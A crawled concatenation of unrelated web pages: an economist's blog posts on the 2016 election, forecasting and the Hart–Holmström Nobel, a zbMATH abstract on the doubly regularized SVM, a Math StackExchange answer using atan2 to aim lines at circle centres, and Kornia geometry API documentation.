Who thinks that President Obama will say on January 20 that he is NOT stepping down because his “replacement” lost the popular vote and won the electoral college because of Russian hacking? The whole idea seems farfetched. On the other hand, if PEOTUS Trump loses the election in four years, who thinks he might say the election was rigged and try to stay on? This does not seem farfetched.
So the most important job of Congress is to check-and-balance PEOTUS’s excesses. How should Congress do so? As usual, Roger Myerson is ahead of the rest of us in thinking about this. In a blog post he writes:
America’s constitutional system depends fundamentally on a balanced distribution of power between the separate branches of government. Over the past century, a long expansion in the size and scope of federal agencies has entailed a steady growth of presidential power. Now, with a President-elect who has never exercised public power within constitutional limits, our best hope is that the next four years should be a time for strengthening the effective authority of Congress. For this vital goal, Democrats today should support the constitutional right of congressional majorities to legally direct the policies and actions of the federal government, even when those majorities happen to be Republican.
His blog post makes many points including regarding the paradoxical impact of term limits for Congress and the misuse of the filibuster.
Eat at Tacqueria El Milagro:
Chile Relleno tacos
The poll aggregators were wildly off as they gave Hillary Clinton an over 90% chance of winning. Nate Silver was the most pessimistic because of his theory of correlated forecasting errors:
#### State outcomes are highly correlated with one another, so polling errors in one state are likely to be replicated in other, similar states….If Clinton loses Pennsylvania despite having a big lead in the polls there, for instance, she might also have problems in Michigan, North Carolina and other swing states.
The correlating factor appears to be the white working class vote which abandoned Clinton in the Rust Belt States. For reasons we do not yet fully understand, this vote for Trump did not appear in polls. The polls were then all off the mark in all Rust Belt states.
The others poll aggregators assumed independence and gave less thought to a simple theory of voting that might generate independence let alone whether such a theory might be plausible. If they hand, it would have led them to a more plausible way to look at the data, like Silver, and hence better predictions.
(HT Georgy Egorov though I may not be doing justice to his point.)
The most likely outcome for the Trump Presidency is that it will Bush 2.0 with some Trumpian twists. Specifically:
1. Tax cuts for the wealthy: No brainer
2. Rolling back financial regulation: No-brainer
3. Comeuppance for 1 and 2: Either another bubble like 2008 or huge deficits leading eventually to a tax increase (like Reagan to (H.W.) Bush).
4. Another war: Trump is thin-skinned and hence a prime candidate for manipulation by terrorists who seek to escalate conflict. So, another war beckons. Probably, Syria in a coalition with Putin.
Trumpian twists:
1. Construction: Trump is will try to build roads, bridges, infrastructure etc. This is an anathema to Paul Ryan et al. They will try to prevent this so not clear how much will happen. Democrats of course will be into this and will try to help Trump achieve it.
2. Russia expansion: Putin will co-opt Baltic States. NATO will not defend hence this will be the end of NATO credibility.
3. Trade: Token tariffs will be imposed. Maybe Carrier Air Conditioner will be made into an example. But given threat of retaliation by trading partners, Ryan/McConnell will dampen trade controls. Whatever happens, there will be little impact on jobs as technological change means fewer workers needed in manufacturing.
4. The Wall: He will build a tall but small wall. TV crews will film it. Construction will stop but Trump will lie and say he built whole thing.
5. Racism will go up: No-Brainer.
President-elect Trump main framework for organizing human interaction is the zero-sum game. If he gives you anything, he wants something in return. He will soon be able to apply this deal-making philosophy to our strategic partners like Japan and South Korea.
We can measure the costs of the bases, the personnel and the nuclear weapons that are helping given them security. The benefits – stopping nuclear proliferation – are hard to measure. Are we giving them something for free? That is Trump’s perspective it seems. Can he get a better deal? If not, why not let these countries go nuclear? From the perspective of out strategic partners, if the US is not holding them up, why not go nuclear?
So, chances are, we will see nuclear proliferation among our “allies” in the Trump Presidency.
Evangelical Christians knew who Trump was, had seen the videos and ads and yet still voted for Trump. Their main issue is the make-up of the Supreme Court and Trump gave them a list of potential nominees they liked . He was more likely to choose an anti-abortion justice than Hillary. So, the vast majority worked out their constrained optimal choice and went for it.
Greens could register a protest vote for Jill Stein in the election or choose between one of two electable candidates. No doubt, Jill, if elected, would have tried to implement a first-best environmental policy (and failed to get it past a Republican Congress) but realistically it was choice between Hillary getting nothing done or Trump ripping up the Obama legacy. The obvious legacy of interest to Greens is the Paris agreement and this is now the Paris disagreement. And in Michigan and Wisconsin, Hillary’s margin of loss is smaller than Jill Stein’s vote. Of course, this is not enough – Robby Mook would have to have had the foresight to get Beyonce to come to Philly not Cleveland.
So why are Evangelicals better than Greens at this kind of reasoning? Are Greens just crazier? My colleague Jorg Spenkuch found a clever way to measure the fraction of crazy Greens in Germany – I think he finds it is 60%. Not sure if he has a way to measuring crazy German Evangelicals (if they exist)! Another theory would be based on learning. Evangelicals have been around the block a while and have learned the optimal strategy but Greens have not. But a counterargument is the Gore vs Bush Florida battle where Ralph Nader played a crucial role. Surely the Greens voters could remember having screwed up the election of the person who would have been the best President on the environment ever? I parry this thrust by positing the Greens who voted for Jill Stein are so young that Bush v Gore is not part of their recalled history.
HT Krugman
I was discussing some forecasts of what might befall under a Trump Presidency with a friend. He was skeptical of one of them but it turns out Henry Kissinger agrees with me:
JG: So there is some chance of more instability.
HK: I would make a general statement: I think most of the world’s foreign policy has been in suspense for six to nine months, waiting for the outcome of our election. They have just watched us undergo a domestic revolution. They will want to study it for some period. But at some point, events will necessitate decision making once more. The only exception to this rule may be nonstate groups; they may have an incentive to provoke an American reaction that undermines our global position.
JG: The threat from isis is more serious now?
HK: Nonstate groups may make the assessment that Trump will react to a terror attack in a way that suits their purposes.
How do you assess whether a probabilistic forecast was successful? Put aside the question of sequential forecasts updated over time. That’s a puzzle in itself but on Monday night each forecaster will have its final probability estimate and there remains the question of deciding, on Wednesday morning, which one was “right.”
Give no credibility to pronouncements by, say 538, that they correctly forecasted X out of 50 states. According to 538’s own model these are not independent events. Indeed the distinctive feature of 538’s election model is that the statewide errors are highly correlated. That’s why they are putting Trump’s chances at 35% as of today when a forecast based on independence would put that probability closer to 1% based on the large number of states where Clinton has a significant (marginal) probability of winning.
So for 538 especially (but really for all the forecasters that assume even moderate correlation) Tuesday’s election is one data point. If I tell you the chance of a coin coming up Armageddon Tails is 35%, you toss it once and it comes up Tails you certainly have not proven me right.
The best we can do is set up a horserace among the many forecasters. The question is how do you decide which forecaster was “more right” based on Tuesday’s outcome? Of course if Trump wins then 538 was more right than every other forecaster but we do have more to go on than just the binary outcome.
Each forecaster’s model defines a probability distribution over electoral maps. Indeed they produce their estimates by simulating their models to generate that distribution and then just count the fraction of maps that come out with an Electoral win for Trump. The outcome on Tuesday will be a map. And we can ask based on that map who was more right.
What yardstick should be used? I propose maximum likelihood. Each forecaster on Monday night should publish their final forecasted distribution of maps. Then on Wednesday morning we ask which forecaster assigned the highest probability to the realized map.
That’s not the only way to do it of course, but (if you are listening 538, etc) whatever criterion they are going to use to decide whether their model was a success they should announce it in advance.
It was great to wake up this morning and find that Oliver Hart and Bengt Holmström were awarded the Nobel Prize in Economics for 2016. Their research is the bread and butter of modern economic theory and hence is taught in all first-year PhD microeconomics courses and more applied versions are taught to MBAs in electives on organizational economics.
Let me begin with the work of Bengt Holmström. The prize announcement begins with his work on the principal-agent model with moral hazard: An agent privately chooses an action that impacts the welfare of a principal. The principal observes noisy signals of the action and rewards the agent as a function of the signals to align incentives. Holmström asks: Which variables should be included by the principal is her performance measure and which should be omitted? In the “sufficient statistic” result, he shows that variables should be included if and only if they contain information about the action. Adding more signals into a performance measure would add superfluous noise into payments which the a risk-averse agent would have to be compensated for. On the other hand, subtracting informative signals from a performance would eliminate useful information for aligning incentives.
This result poses a puzzle which Bengt turns to in later work: Real-world contracts are rarely as complex as the informativeness principle would suggest. Why is that the case? In joint work with Paul Milgrom, Holmström introduced the multi-task principal agent model. The main innovation was to allow the agent to perform multiple tasks and to substitute from one to the other. Holmström and Milgrom show that in certain circumstances it is better not to may pay responsive to performance. Suppose someone working in a fast food restaurant can look after the kitchen or sell burgers. Burger sales are measurable but time spent looking after the kitchen is not. Then making pay depend on burger sales can backfire as the agent substitutes away from looking after the kitchen. Better to have low-powered incentives which are relatively flat in burger sales.
Bengt has made at least two other seminal contributions to moral hazard models. In his work on moral hazard in teams he shows that it might be impossible achieve total value maximizing outcomes when joint output is measurable but individual output is not. In his career concerns model, he shows that an agent trying to prove he is high ability to a market might work too hard at the start of his career and then tail off at the end. All these papers are workhorses of applied theory. They show Holmström’s flair of coming up with models that serve as vehicles for others to make interesting contributions to understanding incentives.
I want to end my appreciation of Bengt Holmström by pointing out that several of these papers were written when he was an Assistant Professor in the MEDS Department at Kellogg. Roger Myerson has already won a Nobel Prize for the work he did when he was in MEDS.
Oliver Hart took contract theory in a different direction by emphasizing the role of property rights. In the principal-agent model, the principal might be an employer and the agent an employee. Or the principal might be one firm and the agent an independent subcontracter. In other words, the model cannot address the question of when trade should take place within a firm or across two firms. Building on some informal ideas of Oliver Williamson, Oliver Hart with Sandy Grossman and John Moore used the idea that contracts are incomplete to offer a unified theory of the optimal allocation of property rights. The key idea is that ownership of an asset confers residual rights of control so you can use it for production should a relationship break down. Suppose a buyer and a seller are trading a widget. They can both invest ex ante to increase the value of trade but because contracts are incomplete they must haggle over the price ex post. This means both are subject to hold-up: the benefit of any costly investment is shared with the other trading party. Hence, both will underinvest. This underinvestment is mitigated by the fact that if a player owns an asset he can use it to trade with others so at least he can capture some value from his investment. So, if one player’s investment is particularly important for value creation he should be own all the assets and employ the other – so we have an integrated firm. If both players’ investments are important, then they should both own assets and then we have trade across two independent firms.
Debt and equity confer decision rights in different ways. So, Oliver Hart’s way of looking at control rights has proved to be very fruitful in corporate finance. But there is a lot to be done. In particular, without a theory of why contracts are incomplete there is a tension between the lessons of mechanism design and the ideas in Grossman-Hart-Moore. This tension was pointed out by Maskin and Tirole. Eric Maskin was my PhD advisor at Harvard and Oliver arrived at Harvard just as I graduated. At that point, my friend, co-author and advisor Tomas Sjöström, who was sitting at the podium during the announcement as he is on the Nobel Committee, was an assistant professor at Harvard and I would visit to work with him. We became interested in Oliver’s ideas and also knew of the Maskin-Tirole critique. So, Tomas and I wrote a few papers studying optimal decision rights when agents can collude or renegotiate inefficient outcomes without falling afoul of the Maskin-Tirole critique. I continue to work on these questions still. I would never have worked on those papers without Oliver’s seminal insights to build on. So, I am particularly happy personally with this prize.
Trump excites the “base” but not independents or traditional Republicans who believe in free markets etc. The temptation for Congressional Republicans up for election is to use “strategic ambiguity” and have their cake and eat it. That is, say you support the Republican Presidential nominee but not embrace his positions, e.g like Ayotte and McCain. This way, you hope ticket-splitters vote for you to check and balance Hillary.
Unfortunately, Obama moves second. He will say Trump is unfit to be President, is not a Republican and will tar supporters with the same brush. This way he will seek to slice off the base vote from the non-base. A vote for a supporter is a vote for Trump. How will they check and balance a demagogue when they are not splitting with him now? Also – and somewhat unexpectedly – Trump is helping Obama out here by refusing to endorse Congressional Republicans employing strategic ambiguity. He refuses to endorse Ayotte and McCain because of criticisms etc. Hence,he is signaling to his base not to support them (not sure if his strategy makes sense but I will take him at face value).
So, on the one hand, Obama will attack anyone on the fence by saying they support Trump (hoping to peel off independents, “real” Republicans and ticket-splitters) and Trump will attack anyone on the fence by saying they do not support him (hoping his base will not support them?!!).
So, strategic ambiguity is going to backfire so you have to pick a side. Which side? Can you win if you support him and he loses your state? If the answer is a likely Yes, you support Trump (e.g. Rubio) and if it is a No, you Dump Trump. The more likely your state is to go for Hillary, the more plausible your “I will check and balance Hillary” argument and the less costly it is to Dump Trump. Hence, Toomey and Ayotte are likely in this category. If the state is 50-50 like AZ, your choice is difficult, eg McCain, but you have to pick a side otherwise both may not vote for you.
1. Suppose one forecaster says the probability Trump wins is q and the other says the probability is p>q. If Trump in fact wins, who was “right?”
2. Suppose one forecaster says the probability is q and the other says the probability is 100%. If Trump in fact wins, who was right?
3. Suppose one forecaster said q in July and then revised to p in October. The other said q’ < q in July but then also revised to p in October. Who was right?
4. Suppose one forecaster continually revised their probabilistic forecast then ultimately settled on p<1. The other forecaster steadfastly insisted the probability was 1 from beginning to end. Trump wins. Who was right?
5. Suppose one forecaster’s probability estimates follow a martingale (as the laws of probability say that a true probability must do) and settles on a forecast of q. The other forecaster‘s “probability estimates” have a predictable trend and eventually settles on a forecast of q’>q. Trump wins. Who was right?
6. Suppose there are infinitely many forecasters so that for every possible sequence of events there is at least one forecaster who predicted it with certainty. Is that forecaster right?
Henry VIII (the right-wing of the Tory party) wanted to divorce his first wife (the EU) and marry Anne Boleyn (stop immigration and transfer payments to the EU ) but the Catholic Church (Angela Merkel) would not let him. So, he renounced Catholicism and became a Protestant, a new form of Christianity conceived by Martin Luther (Nigel Farage). But then Mary Queen of Scots (Nicola Sturgeon), a Catholic, married a French Prince when Elizabeth I (Boris Johnson) eventually came to the throne. Mary got beheaded and the Elizabeth’s reign turned out pretty well.
But here Boris’s and Elizabeth’s paths diverge. The Protestant Reformation was forward looking and emphasized the work ethic. Faragism – to the extent it is a philosophy – is backward-looking and is about denying globalization. Not clear then who gets beheaded, Boris or Nicola.
Trump is the Principal and a Republican Congress member is the Agent. Trump wants their support and wants to compel them to support him. There is no money to align incentives and all Trump can do is shower with praise (e.g. people who cave in to him are “brave” like Megyn Kelly who went to visit him in Trump Tower after their dustup) or rain down abuse (e.g. the Republican Governor Martinez of New Mexico who dared to text during one of his speeches).
From the Agent perspective, since there is no money, there is only re-election probability. This leads to two cases. In one case, the Agents reelection probability is increasing in being seen as pro-Trump. Then, Trump should allocate praise and abuse in the natural way. In the other case, the Agent’s re-election probability is decreasing in being seen as pro-Trump but Trump would still like Republican support to increases his election chances. Then, Trump should visit the Agent’s district if the Agent does not support Trump. He should say the Agent is brave and lie and say the Agent does support him. This threat maximizes compellence.
Marco Rubio provides the most interesting example. He has lumped in with Trump as he decides whether to run for re-election. If he throws his hat into the ring and Trump’s polls tank in Florida, Donald should threaten to campaign there heavily if Rubio shows signs of weakening in his support of Trump.
What I wrote yesterday:
When Fox broadcasts the Super Bowl they advertise for their shows, like American Idol. But those years in which, say, ABC has the Super Bowl you will never see an ad for American Idol during the Super Bowl broadcast.
This is that sort of puzzle whose degree of puzzliness is non-monotonic in how good your economic intuition is.
If you don’t think of it in economic terms at all it doesn’t seem at all like a puzzle. Try it: ask your grandpa if he thinks that its odd that you never see networks advertising their shows on other networks. Of course they don’t do that.
When you apply a little economics to it that’s when it starts to look like a puzzle. There is a price for advertising. The value of the ad is either higher or lower than the price. If its higher you advertise. If its another network that price is the cost of advertising. If its your own network that price is still a cost: the opportunity cost is the price you would earn if instead you sold the ad to a third-party. If it was worth it to advertise American Idol when your own network has the Super Bowl then it should be worth it when some other network has it too.
But a little more economics removes the puzzle. Networks have market power. The way to use that market power for profit is to artificially restrict quantity and set price above marginal cost. (The marginal cost of running another 30 second ad is the cost in terms of viewership that would come from shortening, say, the halftime show by 30 seconds.)
When a network chooses whether to run an ad for its own show on its own Super Bowl broadcast it compares the value of the ad to that marginal cost. When a network chooses whether to run an ad on another network’s Super Bowl broadcast it compares the value to the price.
Indeed even if the total time for ads is given and not under control of the network (i.e. total quantity is fixed) the profit maximizing price for ads will typically only sell a fraction of that ad time. Then the marginal (opportunity) cost of the additional ads to pad that time is zero and even very low value ads like for American Idol will be shown when Fox has the Super Bowl and not when any other network does.
In fact that last observation and the fact that you never ever see any network advertise its shows on another network tells us that the value of advertising television shows is very low. Perhaps that in fact tells us that the networks themselves understand (but their paying advertisers don’t) that the value of advertising in general is very low.
When Fox broadcasts the Super Bowl they advertise for their shows, like American Idol. But those years in which, say, ABC has the Super Bowl you will never see an ad for American Idol during the Super Bowl broadcast.
More generally, networks advertise their own shows on their own network but never pay to advertise their shows on other networks. I never understood this. But I think I finally figured it out, there’s some very simple economics behind this.
Right now at Primary.guide, you can read the current betting market odds for a “contested convention” and a “brokered convention.” The definitions are as follows. A contested convention means that no candidate has 1237 delegates by the end of the last primary. A brokered convention means that no candidate wins on the first ballot at the convention.
Right now the odds of a brokered convention are 50%. Note also that the odds of a Trump nomination are 50% as well. And Trump is the only candidate with any chance of winning a majority on the first ballot (even if he doesn’t get 1237 bound delegates he will be close and no other candidate could combine their bound delegates with unbound delegates to get to a majority.)
Thus, if there is no brokered convention Trump is the nominee. The probability of no brokered convention is 50%. Thus the entire 50% probability of a Trump nomination is accounted for by the event that he wins on the first ballot.
In other words there is zero probability, according to betting markets, that Trump wins a brokered convention.
The odds of a contested convention are 80%. That means that betting markets think there is a 30% chance Trump fails to get 1237 bound delegates but still wins on the first round. I.e. according to betting markets we have the following three mutually exclusive events:
1. Trump gets to 1237 by June 7. 20% odds
2. Trump fails to get 1237 bound delegates but wins on the first ballot. 30%
3. Nobody wins on the first ballot and Trump is not the nominee. 50%
Donald Trump:
You are a lifelong Republican and think Trump is not a conservative. You would never vote for him. You go into the voting both and see Clinton’s name and Trump’s name. What do you do? Either you bite the bullet and vote for Clinton or you abstain. Either way you have increased the probability that Hillary wins – OK not by much but since you are in the voting booth in the first place, you’re not a fully rational voter and so you care about the infinitesimal impact you have. So, you decide to make sure she’s hamstrung by a Republican Congress. You vote for the Republican Congressional candidates.
You would vote for Cruz but suspect he is a bit nuts. You vote for the Democratic Congressional candidates to make sure Cruz is ineffective.
(Kasich would actually be best all round but has no chance of making it.)
Suppose politician C goes negative on politician M. Politician’s M’s support declines..where do his supporters go? If there are just two candidates, they either go to politician C or stay at home. But if there are three or more candidates, they might go to politician A, B, or K etc etc. So, to a first order, it is less profitable to go negative the greater the number of candidates.
This resembles the Holmstrom teams model but with unproductive effort.
HENNIKER, New Hampshire — In town halls, pizzerias, and high school auditoriums, hundreds of voters are carefully evaluating the three governors who have pinned their presidential hopes on Tuesday’s primary in the Granite State — Jeb Bush, Chris Christie, and John Kasich.
Some have made their choice of the three; others are still undecided. But they all agree on one big thing: The Republican Party needs a strong contender coming out of New Hampshire to take down Donald Trump.
With the stakes so high, these “non-angry voters,” as described by some, are wrestling with whether to ultimately vote for their personal favorite — one of the three governors, or go by the polls in favor of a more practical favorite, Sen. Marco Rubio.
Perhaps the GOP should adopt approval voting as suggested by my colleague Bob Weber where each voter can “approve” as many candidates as he likes.
Of course, Ted Cruz and Donald Trump would disapprove or approval voting.
ISIL has taken war out of the Middle East by bombing a Russian plane and attacking Paris. These attacks follow increased Russian and Western involvement in Syria.
What was the purpose of these attacks? It is useful to examine two polar opposite cases : ISIL’s acts seek to provoke or seek to deter.
If they seek to provoke, the best case scenario for ISIL is that Russia and the West respond by repressing Muslims domestically. This anti-Muslim fervor will generate propaganda that is useful for recruitment. But of course, the attacks will provoke a strong counter-response by France, Russia and their allies in Syria. Finally, a Russia-Western coalition may even come into being. Al Qaeda’s diminished fate then awaits ISIL. A provocation cannot be targeted into only a domestic response and the international response will be so dramatic as to counterbalance any domestic response though, of course, it would also be wise not to give in to the temptation to cave in to anti-Muslim fervor.
If ISIL seek to deter – i.e. they are making us pay a price for increased involvement in Syria and giving us an incentive to retreat – well that’s totally going to backfire. The French, British and Russians are more likely to engage than less as I said above. In this case, ISIL’s strategy would be a complete misreading of the situation.
So, either way, the ISIL strategy is going to fail.
My colleagues are multi-talented:
Robert McDonald, Associate Dean for Faculty, and Jeff Cohen performing “Here comes the weekend” by Dave Edmunds and Nick Lowe and “What’s so funny about peace, love and understanding?” by Nick Lowe.
HT: Bob McDonald for telling me first song is also by Dave Edmunds.
### Email Subscription
Enter your email address to subscribe to this blog and receive notifications of new posts by email.
Join 1,822 other followers | 2017-04-27 14:57:02 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 36, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4199606776237488, "perplexity": 2708.9875017639865}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917122174.32/warc/CC-MAIN-20170423031202-00157-ip-10-145-167-34.ec2.internal.warc.gz"} |
https://zbmath.org/?q=an%3A1126.68070 | ## The doubly regularized support vector machine.(English)Zbl 1126.68070
Summary: The standard $$L_2$$-norm Support Vector Machine (SVM) is a widely used tool for classification problems. The $$L_1$$-norm SVM is a variant of the standard $$L_2$$-norm SVM, that constrains the $$L_1$$-norm of the fitted coefficients. Due to the nature of the $$L_1$$-norm, the $$L_1$$-norm SVM has the property of automatically selecting variables, not shared by the standard $$L_2$$-norm SVM. It has been argued that the $$L_1$$-norm SVM may have some advantage over the $$L_2$$-norm SVM, especially with high dimensional problems and when there are redundant noise variables. On the other hand, the $$L_1$$-norm SVM has two drawbacks: (1) when there are several highly correlated variables, the $$L_1$$-norm SVM tends to pick only a few of them, and remove the rest; (2) the number of selected variables is upper bounded by the size of the training data. A typical example where these occur is in gene microarray analysis. In this paper, we propose a Doubly regularized Support Vector Machine (DrSVM). The DrSVM uses the elastic-net penalty, a mixture of the $$L_2$$-norm and the $$L_1$$-norm penalties. By doing so, the DrSVM performs automatic variable selection in a way similar to the $$L_1$$-norm SVM. In addition, the DrSVM encourages highly correlated variables to be selected (or removed) together. We illustrate how the DrSVM can be particularly useful when the number of variables is much larger than the size of the training data $$(p\gg n)$$. We also develop efficient algorithms to compute the whole solution paths of the DrSVM. | 2022-08-09 22:14:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8682525753974915, "perplexity": 366.056646743599}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571090.80/warc/CC-MAIN-20220809215803-20220810005803-00369.warc.gz"} |
https://math.stackexchange.com/questions/2969595/draw-a-line-from-point-to-circle-circumference-but-pointing-at-the-center | Draw a line from point to circle circumference, but pointing at the center
I have an app, where I draw a graph. From each circle in this graph there are some lines to other circles. To not mess up my drawing, I tend to draw the line up from the circle, then horizontally in direction of the other circle. Then I stop some pixels before the other circle center and I draw the line from there to the other circles center. Now I wanted to clear the drawing, cuz when there are many lines going to the same circle, it's hard to see if the line ends with an arrow.
So I thought the lines would go into circles center direction, but they would stop at the circumference. Here's how it looks like:
As you can see, the lines which come from the left side to the right side (f.e from q1 to q2) are really fine, definitely pointing at the center, but not going inside.
But what about the lines coming from the right to the left (f.e from q4 to q1 or q3 to q1). You can clearly see, that they stop at the circumference, but they definitely do not point at the center, which is really not aesthetic.
This is the algorithm I came up with:
1. I have X and Y of the point from I will be drawing the line (the final line, cuz every
line consists of 3 lines -> the one which goes up or down, the one which goes
horizontally and the last one, which connects the end of the 2nd line with circle center)
2. Then I take the X and Y of the circle to which I would be drawing a line
3. a = circleCenter.X - lineEnd.X
b = circleCenter.Y - lineEnd.Y
c = sqrt(a^2 + b^2)
4. sin(alfa) = b/c
5. alfa = asin(sin(alfa)) - PI
6. Now I want to get the point on the circle:
newPoint.X = R * cos(alfa)
newPoint.Y = R * sin(alfa)
7. newPoint has X and Y like the circle would be in 0, 0, so I need to do:
newPoint.X = circleCenter.X + newPoint.X
newPoint.Y = circleCenter.Y + newPoint.Y
8. And then I draw to this point
And as you can see, it works perfectly for those coming from the left, but not so well for those coming from the right
• for lines coming from the right you do not need to subtract $\pi$ – Vasya Oct 24 '18 at 19:46
• If I do what you say - subtract PI if coming from the left, and not subtract when coming from the right, this happens: i.imgur.com/DjBAF64.png – minecraftplayer1234 Oct 24 '18 at 19:58
• your problem is with angle calculations: you have to consider 4 cases: right line coming from top or bottom, left line coming from top or bottom. Depending on that, cosine and sine function will have a different sign. When you take asin, it gives you angle between $-\pi/2$ and $\pi/2$ – Vasya Oct 24 '18 at 20:11
The asin function requires you to do various tricks to deal with lines that can come from any direction (upper right, upper left, lower right, lower left) because it only gives you half a circle's worth of angles, $$-\frac\pi2$$ to $$\frac\pi2,$$ whereas you need angles all around the circle.
The atan2 function, if your software library has it, is usually much better for applications like this. You call it like this:
atan2(b, a)
and it gives you a full range of angles from $$-\pi$$ to $$\pi,$$ which will be sufficient for lines coming from any direction. Moreover, you don't even need to compute $$c.$$
• Wow, that really helps, now all the lines are actually pointing at the center. The problem is, the points given by those angles tend to make lines go through the circle: i.imgur.com/c07B1WT.png. Is there a way around it? – minecraftplayer1234 Oct 24 '18 at 20:37
• It looks like every single line went all the way across the circle. If you're still subtracting PI, then you should be able to just stop doing that and it will work. Otherwise you can see the point is in the exact opposite direction from the center you want, so do the opposite of whatever you were doing, e.g., subtract instead of adding. – David K Oct 24 '18 at 20:46
• I think you need to use atan2(-b,-a) – Vasya Oct 24 '18 at 20:48
• @DavidK I am not subtracting PI anymore. @Vasya, this is it! atan2(-b, -a) works like a charm! – minecraftplayer1234 Oct 24 '18 at 21:01 | 2019-06-19 18:53:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 5, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5642305612564087, "perplexity": 289.71072215415643}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999040.56/warc/CC-MAIN-20190619184037-20190619210037-00080.warc.gz"} |
https://kornia.readthedocs.io/en/0.5.9/geometry.linalg.html | kornia.geometry.linalg¶
relative_transformation(trans_01, trans_02)[source]
Function that computes the relative homogeneous transformation from a reference transformation $$T_1^{0} = \begin{bmatrix} R_1 & t_1 \\ \mathbf{0} & 1 \end{bmatrix}$$ to destination $$T_2^{0} = \begin{bmatrix} R_2 & t_2 \\ \mathbf{0} & 1 \end{bmatrix}$$.
The relative transformation is computed as follows:
$T_1^{2} = (T_0^{1})^{-1} \cdot T_0^{2}$
Parameters
• trans_01 (Tensor) – reference transformation tensor of shape $$(N, 4, 4)$$ or $$(4, 4)$$.
• trans_02 (Tensor) – destination transformation tensor of shape $$(N, 4, 4)$$ or $$(4, 4)$$.
Return type
Tensor
Returns
the relative transformation between the transformations with shape $$(N, 4, 4)$$ or $$(4, 4)$$.
Example::
>>> trans_01 = torch.eye(4) # 4x4
>>> trans_02 = torch.eye(4) # 4x4
>>> trans_12 = relative_transformation(trans_01, trans_02) # 4x4
compose_transformations(trans_01, trans_12)[source]
Functions that composes two homogeneous transformations.
$\begin{split}T_0^{2} = \begin{bmatrix} R_0^1 R_1^{2} & R_0^{1} t_1^{2} + t_0^{1} \\ \mathbf{0} & 1\end{bmatrix}\end{split}$
Parameters
• trans_01 (Tensor) – tensor with the homogeneous transformation from a reference frame 1 respect to a frame 0. The tensor has must have a shape of $$(B, 4, 4)$$ or $$(4, 4)$$.
• trans_12 (Tensor) – tensor with the homogeneous transformation from a reference frame 2 respect to a frame 1. The tensor has must have a shape of $$(B, 4, 4)$$ or $$(4, 4)$$.
Return type
Tensor
Returns
the transformation between the two frames with shape $$(N, 4, 4)$$ or $$(4, 4)$$.
Example::
>>> trans_01 = torch.eye(4) # 4x4
>>> trans_12 = torch.eye(4) # 4x4
>>> trans_02 = compose_transformations(trans_01, trans_12) # 4x4
inverse_transformation(trans_12)[source]
Function that inverts a 4x4 homogeneous transformation $$T_1^{2} = \begin{bmatrix} R_1 & t_1 \\ \mathbf{0} & 1 \end{bmatrix}$$
The inverse transformation is computed as follows:
$\begin{split}T_2^{1} = (T_1^{2})^{-1} = \begin{bmatrix} R_1^T & -R_1^T t_1 \\ \mathbf{0} & 1\end{bmatrix}\end{split}$
Parameters
trans_12 – transformation tensor of shape $$(N, 4, 4)$$ or $$(4, 4)$$.
Returns
tensor with inverted transformations with shape $$(N, 4, 4)$$ or $$(4, 4)$$.
Example
>>> trans_12 = torch.rand(1, 4, 4) # Nx4x4
>>> trans_21 = inverse_transformation(trans_12) # Nx4x4
transform_points(trans_01, points_1)[source]
Function that applies transformations to a set of points.
Parameters
• trans_01 (torch.Tensor) – tensor for transformations of shape $$(B, D+1, D+1)$$.
• points_1 (torch.Tensor) – tensor of points of shape $$(B, N, D)$$.
Returns
tensor of N-dimensional points.
Return type
torch.Tensor
Shape:
• Output: $$(B, N, D)$$
Examples
>>> points_1 = torch.rand(2, 4, 3) # BxNx3
>>> trans_01 = torch.eye(4).view(1, 4, 4) # Bx4x4
>>> points_0 = transform_points(trans_01, points_1) # BxNx3
transform_boxes(trans_mat, boxes, mode='xyxy')[source]
